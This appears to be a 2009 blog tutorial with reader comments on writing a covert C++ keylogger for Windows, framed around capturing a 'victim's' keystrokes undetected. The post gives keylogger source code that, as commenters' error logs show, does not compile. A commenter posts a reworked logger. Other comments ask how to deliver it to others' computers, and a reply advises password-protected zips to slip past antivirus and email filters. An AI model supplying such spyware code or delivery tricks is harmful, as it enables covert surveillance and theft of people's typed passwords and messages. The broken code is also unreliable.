Tuesday, May 5, 2009

Building a C++ Keylogger

Well, a lot of people have been asking me if there is such thing as an undetectable keylogger and after some quick searching I decided to code one myself. Here is the catch, first of all I'm not going to give you the .exe just the source, you can compile it yourself. Second of all, we are gonna do it one step at a time, one post at a time. But believe me, once we are through we will have a kickass keylogger.

Some features that we will go over:

- Sending logs via FTP
- Sending logs through email
- Running as a system process
- Running on startup
- Window titles and screenshots

What you will need:

- A basic knowledge of C++ (Very Basic)

- A compiler (I did these with Dev)
heres the link to download dev c++ http://www.bloodshed.net/dev/devcpp.html
scroll to the bottom and there is the dload link

- 10 -15 minutes
- A mouse click to subscribe to my blog!

Firstly, we have to understand the 2 basic types of keyloggers:
- Userland based loggers that capture the current state of the keyboard
- Keyboard hooks, filter drivers, or rootkits, that actually intercept the signals

For all intents and purposes, a well coded hook can easily avoid detection, but well coded is very hard to do and to explain, and you can understand it much better if we start with the Userland loggers which can be just as effective.

How these loggers work:

Windows conveniently provides a very nice API which is always undetectable because well, its used for just about anything, including keyloggers. The API is called GetAsyncKeyState()
a quick msdn search reveals that this function takes one value, the vkey or virtual key, an ascii decimal or hex value which represents the key. C++ also comes with some predefined values for example VK_SHIFT is the shift key, you dont need the decimal value. Anyway, this function also returns whether or not the key is pressed down or not. Heres the msdn link.

So, we can use GetAsyncKeyState to check whether the key is pressed down or not, well how does that help us log it? Well you have to walk before you can crawl so first lets add this to our code.


void Logger(){
    int key;
    GetAsyncKeyState(key);
}


Nows the fun part, if we can check if a key is pressed down, why dont we have the program check all the keys for if they are pressed down? Then we will know which key to log? Sounds hard? well no its not, atleast not if we use loops.




void Logger() {
char key[10];
   while(true) {
   Sleep(5);
      for(key = 8; key <= 256; i++){      
         if(GetAsyncKeyState(key)==-32767){      
         StoreKey(key);      
         }
      }
   }
}




lets analyze what this code does, first we initiate a constant while loop. Inside the loop, there is another for loop which cycles through all the common ASCII values and checks if they are being pressed down. If they are, stores this in a file with the storekey function which we will write next. In addition, there is also a Sleep(5); to make sure that this doesnt take up 100% of the cpu and attract the victim's attention.

Now for the store key function.



void StoreKey(char key){
   ofstream storekey("C:\\storekey.txt", ios::app);
   storekey << key;
   storekey.close;
}


This function opens a new ofstream, storekey that directs to a file named storekey.txt in the C drive, it then logs the key to that file and closes the file.

Well now for the complete code. Remember, if you liked this code and want more remember to subscribe and comment! come on guys, i need incentive to keep doing this.
THANKS

--------------------------------------------------------------------------------


#include <windows.h>
#include <fstream>

using namespace std;

void StoreKey(char key){
   ofstream storekey("C:\\storekey.txt", ios::app);
   storekey << key;
   storekey.close;
}


void Logger() {
char key[10];
   while(true) {
   Sleep(5);
      for(key = 8; key <= 256; i++){      
         if(GetAsyncKeyState(key)==-32767){      
         StoreKey(key);      
         }
      }
   }
}

int main(){
   Logger();
   return 1;
}


----------------------------------------------------------------------------------------------- Thats it a simple keylogger. Make sure you subscribe so you catch the next post, it will teach you how to catch all the special characters and maybe even how to send your log to yourself O.o Read! Comment! Subscribe!
Posted by at
Labels: , , ,

12 comments:

  1. UnknownMay 10, 2009 at 3:11 AM

    Thanks ;)

    ReplyDelete
  2. AnonymousMay 28, 2009 at 9:16 PM

    Im getting massive errors when i try to do this in Dev-C++ and I have no clue whats wrong with it... Apparently it cant resolve the address of overloaded function storekey.close, int and char[20] are incompatible? and a host of other issues...

    ReplyDelete
  3. UnknownMay 30, 2009 at 11:39 AM

    These tuts are awesome, would you be able to make a tut for sending the logged text through email?

    ReplyDelete
  4. DuckyAugust 1, 2009 at 1:06 AM

    Awesome tut!

    May i ask what the -32767 means?

    And how to subscribe?

    ReplyDelete
  5. ManSFebruary 16, 2010 at 3:15 AM

    really it's very nice tutorial

    i just want to ask about this : char key[10] !!
    why here we make array !!!

    and :

    for(key=8 ; key<=256 ; i++)

    why i++???

    ReplyDelete
  6. UnknownFebruary 3, 2011 at 6:32 PM

    This is the error log i get when i build it.

    -------------- Build: Debug in Keylogger Simple ---------------

    Compiling: main.cpp
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp: In function 'void StoreKey(char)':
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:10: error: statement cannot resolve address of overloaded function
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp: In function 'void Logger()':
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:18: error: incompatible types in assignment of 'int' to 'char [10]'
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:18: error: ISO C++ forbids comparison between pointer and integer
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:18: error: 'i' was not declared in this scope
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:19: error: invalid conversion from 'char*' to 'int'
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:19: error: initializing argument 1 of 'SHORT GetAsyncKeyState(int)'
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:20: error: invalid conversion from 'char*' to 'char'
    C:\CodeBlocks\WorkSpace\Keylogger Simple\main.cpp:20: error: initializing argument 1 of 'void StoreKey(char)'
    Process terminated with status 1 (0 minutes, 0 seconds)
    8 errors, 0 warnings

    ReplyDelete
  7. UnknownFebruary 27, 2011 at 12:13 PM

    Hey everyone as you probably already found out, this code is horrible written (no offense to the author). so with that said here is the code for a WORKING keylogger.

    NOTE: This keylogger has no stealth or email sender, it only logs the keys pressed to a file saved wherever you saved the project. So if you want to put it upon yourself to add those things feel free :P

    Enjoy :)

    #include
    using namespace std; /*lazy ftw*/
    #include /*to poll key states*/
    #include

    int Save (int key_stroke, char *file); /*Declares key_stroke and file*/

    int main()
    {
    char i;
    while (1)
    {
    for(i = 8; i <= 190; i++)
    {
    if (GetAsyncKeyState(i) == -32767)
    Save(i, "LOG.TXT"); /*saves keys to file named LOG.txt*/
    }
    }
    system ("PAUSE");
    return 0;
    }

    int Save (int key_stroke, char *file)
    {
    if ( (key_stroke ==1) || (key_stroke == 2))
    return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");
    cout << key_stroke << endl;

    if (key_stroke == 8)
    fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); /* Logs the BACKSPACE key*/

    */Here is where you get to enter the rest of the code
    for the other special characters such as
    shift, space, etc.
    */

    else
    fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose(OUTPUT_FILE); /*close output to the file*/
    return 0;
    }

    ReplyDelete
  8. Vishnu BhagyanathMay 19, 2011 at 7:48 AM

    Wait... I use MS Visual C++ Express 2010 ... So i start a new project... WHICH CATEGORY SHOULD I START IN?? Im a Newbie :) .... plz reply
    There is :
    Class Library, CLR Console App, CLR Empty Project, Windows Forms App,Win32 console app, win32 project,empty project, makefile project... plz relpy fast

    ReplyDelete
  9. TSJune 21, 2011 at 3:21 AM

    I am receiving this errors.... plzzzz help me.....I am using borland c++ compiler.....

    Error: noname01.cpp(9,19):Member function must be called or its address taken
    Error: noname01.cpp(17,16):Lvalue required
    Error: noname01.cpp(17,26):Cannot convert 'int' to 'char *'
    Error: noname01.cpp(17,33):Undefined symbol 'i'
    Error: noname01.cpp(18,34):Cannot convert 'char *' to 'int'
    Error: noname01.cpp(18,34):Type mismatch in parameter 'vKey' in call to '__stdcall GetAsyncKeyState(int)'
    Error: noname01.cpp(19,23):Cannot convert 'char *' to 'char'
    Error: noname01.cpp(19,23):Type mismatch in parameter 'key' in call to 'StoreKey(char)'

    ReplyDelete
  10. UnknownJuly 4, 2012 at 5:33 AM

    how to send this keylogger to others computer....thanks for the post

    ReplyDelete
    Replies
    1. Maldivian ChicksJuly 6, 2013 at 1:22 AM

      use a compressed zip folder.Use password protection that way anti virus or email server cannot stop your file from attaching.without password you cannot send a .exe file in zipped folder .

      Delete
  11. Maldivian ChicksJuly 6, 2013 at 1:21 AM

    use a compressed zip folder.Use password protection that way anti virus or email server cannot stop your file from attaching.without password you cannot send a .exe file in zipped folder .

    ReplyDelete

Subscribe to: Post Comments (Atom)